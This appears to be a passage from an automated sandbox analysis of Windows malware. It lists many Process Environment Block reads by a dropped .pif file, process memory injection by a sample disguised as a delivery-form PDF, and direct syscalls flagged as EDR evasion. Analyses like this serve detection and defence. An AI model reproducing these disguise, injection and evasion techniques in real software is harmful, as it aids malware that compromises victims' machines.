                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C8243 mov eax, dword ptr fs:[00000030h]3_2_2A0C8243
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C8243 mov ecx, dword ptr fs:[00000030h]3_2_2A0C8243
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03A250 mov eax, dword ptr fs:[00000030h]3_2_2A03A250
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046259 mov eax, dword ptr fs:[00000030h]3_2_2A046259
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0FA250 mov eax, dword ptr fs:[00000030h]3_2_2A0FA250
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0FA250 mov eax, dword ptr fs:[00000030h]3_2_2A0FA250
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A044260 mov eax, dword ptr fs:[00000030h]3_2_2A044260
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A044260 mov eax, dword ptr fs:[00000030h]3_2_2A044260
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A044260 mov eax, dword ptr fs:[00000030h]3_2_2A044260
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03826B mov eax, dword ptr fs:[00000030h]3_2_2A03826B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07E284 mov eax, dword ptr fs:[00000030h]3_2_2A07E284
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07E284 mov eax, dword ptr fs:[00000030h]3_2_2A07E284
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C0283 mov eax, dword ptr fs:[00000030h]3_2_2A0C0283
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C0283 mov eax, dword ptr fs:[00000030h]3_2_2A0C0283
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C0283 mov eax, dword ptr fs:[00000030h]3_2_2A0C0283
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0502A0 mov eax, dword ptr fs:[00000030h]3_2_2A0502A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0502A0 mov eax, dword ptr fs:[00000030h]3_2_2A0502A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D62A0 mov eax, dword ptr fs:[00000030h]3_2_2A0D62A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D62A0 mov ecx, dword ptr fs:[00000030h]3_2_2A0D62A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D62A0 mov eax, dword ptr fs:[00000030h]3_2_2A0D62A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D62A0 mov eax, dword ptr fs:[00000030h]3_2_2A0D62A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D62A0 mov eax, dword ptr fs:[00000030h]3_2_2A0D62A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D62A0 mov eax, dword ptr fs:[00000030h]3_2_2A0D62A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A2C3 mov eax, dword ptr fs:[00000030h]3_2_2A04A2C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A2C3 mov eax, dword ptr fs:[00000030h]3_2_2A04A2C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A2C3 mov eax, dword ptr fs:[00000030h]3_2_2A04A2C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A2C3 mov eax, dword ptr fs:[00000030h]3_2_2A04A2C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A2C3 mov eax, dword ptr fs:[00000030h]3_2_2A04A2C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1162D6 mov eax, dword ptr fs:[00000030h]3_2_2A1162D6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0502E1 mov eax, dword ptr fs:[00000030h]3_2_2A0502E1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0502E1 mov eax, dword ptr fs:[00000030h]3_2_2A0502E1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0502E1 mov eax, dword ptr fs:[00000030h]3_2_2A0502E1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07A30B mov eax, dword ptr fs:[00000030h]3_2_2A07A30B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07A30B mov eax, dword ptr fs:[00000030h]3_2_2A07A30B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07A30B mov eax, dword ptr fs:[00000030h]3_2_2A07A30B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03C310 mov ecx, dword ptr fs:[00000030h]3_2_2A03C310
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A060310 mov ecx, dword ptr fs:[00000030h]3_2_2A060310
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A118324 mov eax, dword ptr fs:[00000030h]3_2_2A118324
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A118324 mov ecx, dword ptr fs:[00000030h]3_2_2A118324
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A118324 mov eax, dword ptr fs:[00000030h]3_2_2A118324
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A118324 mov eax, dword ptr fs:[00000030h]3_2_2A118324
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10A352 mov eax, dword ptr fs:[00000030h]3_2_2A10A352
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C2349 mov eax, dword ptr fs:[00000030h]3_2_2A0C2349
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C035C mov eax, dword ptr fs:[00000030h]3_2_2A0C035C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C035C mov eax, dword ptr fs:[00000030h]3_2_2A0C035C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C035C mov eax, dword ptr fs:[00000030h]3_2_2A0C035C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C035C mov ecx, dword ptr fs:[00000030h]3_2_2A0C035C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C035C mov eax, dword ptr fs:[00000030h]3_2_2A0C035C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C035C mov eax, dword ptr fs:[00000030h]3_2_2A0C035C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E8350 mov ecx, dword ptr fs:[00000030h]3_2_2A0E8350
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A11634F mov eax, dword ptr fs:[00000030h]3_2_2A11634F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E437C mov eax, dword ptr fs:[00000030h]3_2_2A0E437C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06438F mov eax, dword ptr fs:[00000030h]3_2_2A06438F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06438F mov eax, dword ptr fs:[00000030h]3_2_2A06438F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03E388 mov eax, dword ptr fs:[00000030h]3_2_2A03E388
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03E388 mov eax, dword ptr fs:[00000030h]3_2_2A03E388
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03E388 mov eax, dword ptr fs:[00000030h]3_2_2A03E388
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A038397 mov eax, dword ptr fs:[00000030h]3_2_2A038397
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A038397 mov eax, dword ptr fs:[00000030h]3_2_2A038397
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A038397 mov eax, dword ptr fs:[00000030h]3_2_2A038397
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0FC3CD mov eax, dword ptr fs:[00000030h]3_2_2A0FC3CD
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A3C0 mov eax, dword ptr fs:[00000030h]3_2_2A04A3C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A3C0 mov eax, dword ptr fs:[00000030h]3_2_2A04A3C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A3C0 mov eax, dword ptr fs:[00000030h]3_2_2A04A3C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A3C0 mov eax, dword ptr fs:[00000030h]3_2_2A04A3C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A3C0 mov eax, dword ptr fs:[00000030h]3_2_2A04A3C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04A3C0 mov eax, dword ptr fs:[00000030h]3_2_2A04A3C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0483C0 mov eax, dword ptr fs:[00000030h]3_2_2A0483C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0483C0 mov eax, dword ptr fs:[00000030h]3_2_2A0483C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0483C0 mov eax, dword ptr fs:[00000030h]3_2_2A0483C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0483C0 mov eax, dword ptr fs:[00000030h]3_2_2A0483C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C63C0 mov eax, dword ptr fs:[00000030h]3_2_2A0C63C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE3DB mov eax, dword ptr fs:[00000030h]3_2_2A0EE3DB
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE3DB mov eax, dword ptr fs:[00000030h]3_2_2A0EE3DB
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE3DB mov ecx, dword ptr fs:[00000030h]3_2_2A0EE3DB
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE3DB mov eax, dword ptr fs:[00000030h]3_2_2A0EE3DB
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E43D4 mov eax, dword ptr fs:[00000030h]3_2_2A0E43D4
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E43D4 mov eax, dword ptr fs:[00000030h]3_2_2A0E43D4
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h]3_2_2A0503E9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h]3_2_2A0503E9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h]3_2_2A0503E9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h]3_2_2A0503E9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h]3_2_2A0503E9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h]3_2_2A0503E9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h]3_2_2A0503E9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0503E9 mov eax, dword ptr fs:[00000030h]3_2_2A0503E9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05E3F0 mov eax, dword ptr fs:[00000030h]3_2_2A05E3F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05E3F0 mov eax, dword ptr fs:[00000030h]3_2_2A05E3F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05E3F0 mov eax, dword ptr fs:[00000030h]3_2_2A05E3F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0763FF mov eax, dword ptr fs:[00000030h]3_2_2A0763FF
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4000 mov ecx, dword ptr fs:[00000030h]3_2_2A0C4000
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h]3_2_2A0E2000
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h]3_2_2A0E2000
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h]3_2_2A0E2000
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h]3_2_2A0E2000
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h]3_2_2A0E2000
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h]3_2_2A0E2000
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h]3_2_2A0E2000
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E2000 mov eax, dword ptr fs:[00000030h]3_2_2A0E2000
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05E016 mov eax, dword ptr fs:[00000030h]3_2_2A05E016
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05E016 mov eax, dword ptr fs:[00000030h]3_2_2A05E016
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05E016 mov eax, dword ptr fs:[00000030h]3_2_2A05E016
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05E016 mov eax, dword ptr fs:[00000030h]3_2_2A05E016
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03A020 mov eax, dword ptr fs:[00000030h]3_2_2A03A020
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03C020 mov eax, dword ptr fs:[00000030h]3_2_2A03C020
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D6030 mov eax, dword ptr fs:[00000030h]3_2_2A0D6030
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A042050 mov eax, dword ptr fs:[00000030h]3_2_2A042050
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C6050 mov eax, dword ptr fs:[00000030h]3_2_2A0C6050
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06C073 mov eax, dword ptr fs:[00000030h]3_2_2A06C073
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04208A mov eax, dword ptr fs:[00000030h]3_2_2A04208A
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0380A0 mov eax, dword ptr fs:[00000030h]3_2_2A0380A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D80A8 mov eax, dword ptr fs:[00000030h]3_2_2A0D80A8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1060B8 mov eax, dword ptr fs:[00000030h]3_2_2A1060B8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1060B8 mov ecx, dword ptr fs:[00000030h]3_2_2A1060B8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C20DE mov eax, dword ptr fs:[00000030h]3_2_2A0C20DE
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03A0E3 mov ecx, dword ptr fs:[00000030h]3_2_2A03A0E3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C60E0 mov eax, dword ptr fs:[00000030h]3_2_2A0C60E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0480E9 mov eax, dword ptr fs:[00000030h]3_2_2A0480E9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03C0F0 mov eax, dword ptr fs:[00000030h]3_2_2A03C0F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0820F0 mov ecx, dword ptr fs:[00000030h]3_2_2A0820F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE10E mov eax, dword ptr fs:[00000030h]3_2_2A0EE10E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE10E mov ecx, dword ptr fs:[00000030h]3_2_2A0EE10E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE10E mov eax, dword ptr fs:[00000030h]3_2_2A0EE10E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE10E mov eax, dword ptr fs:[00000030h]3_2_2A0EE10E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE10E mov ecx, dword ptr fs:[00000030h]3_2_2A0EE10E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE10E mov eax, dword ptr fs:[00000030h]3_2_2A0EE10E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE10E mov eax, dword ptr fs:[00000030h]3_2_2A0EE10E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE10E mov ecx, dword ptr fs:[00000030h]3_2_2A0EE10E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE10E mov eax, dword ptr fs:[00000030h]3_2_2A0EE10E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EE10E mov ecx, dword ptr fs:[00000030h]3_2_2A0EE10E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A100115 mov eax, dword ptr fs:[00000030h]3_2_2A100115
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EA118 mov ecx, dword ptr fs:[00000030h]3_2_2A0EA118
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EA118 mov eax, dword ptr fs:[00000030h]3_2_2A0EA118
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EA118 mov eax, dword ptr fs:[00000030h]3_2_2A0EA118
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EA118 mov eax, dword ptr fs:[00000030h]3_2_2A0EA118
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A070124 mov eax, dword ptr fs:[00000030h]3_2_2A070124
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D4144 mov eax, dword ptr fs:[00000030h]3_2_2A0D4144
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D4144 mov eax, dword ptr fs:[00000030h]3_2_2A0D4144
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D4144 mov ecx, dword ptr fs:[00000030h]3_2_2A0D4144
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D4144 mov eax, dword ptr fs:[00000030h]3_2_2A0D4144
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D4144 mov eax, dword ptr fs:[00000030h]3_2_2A0D4144

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeMemory allocated: C:\Users\Public\Libraries\dxobknwL.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: C:\Users\Public\Libraries\dxobknwL.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFMemory allocated: C:\Users\Public\Libraries\dxobknwL.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtClose: Direct from: 0x76F02B6C
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
